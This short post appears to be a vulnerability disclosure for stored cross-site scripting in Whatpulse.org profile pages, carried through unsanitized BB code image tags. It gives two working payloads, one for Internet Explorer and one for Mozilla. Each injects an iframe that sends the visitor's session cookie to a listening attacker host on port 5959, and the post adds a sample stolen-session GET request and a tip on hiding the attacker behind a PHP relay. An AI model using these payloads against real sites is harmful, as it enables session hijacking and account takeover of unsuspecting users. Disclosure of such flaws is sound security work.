Whatpulse.org is a site that provides software to allower users to keep track of how many keystrokes they have entered and 'pulse' them to the website and view who has the most keys to date, etc.  Whatpulse has a profile feature that lets a user describe a little bit about themself to otherusers.  The vulnerability lies within the profile's allowance of unsanitized BB code.  Here is the example code:


[IMG=Javascript:document.write('><iframe src=http://attackerip:5959?' + document.cookie + '  height=1% width=1%></iframe>');][/IMG]

[IMG="asdf" onMouseMove="document.write('-<iframe src=http://attackerip:5959?' + document.cookie + ' scrolling=no hspace=0 vspace=0 height=1% frameborder=0 width=1%></iframe>')""" style="Z-INDEX: 100; LEFT: 0px; POSITION: absolute; TOP: 0px; height:2000px; width:8000px;"]asdf[/IMG]



there is a line break in the code.  the top image tag works for IE users, the second image tag works for mozilla users, the second one is triggered by moving the mouse over the webpage.  The above example will connect to the attacker's ip address on a listening port, in this case 5959 and request a page, in this case it will request a page named after their session cookie, giving the attacker their session id.  This of course can be modified to submit to a php application helping to cloak the attacker from identification.  When you submit the user cookie you submit it in the Get request, for example:

GET /?PHPSESSID=eec5a9da58ecd36422e53dc89194af15; HTTP/1.1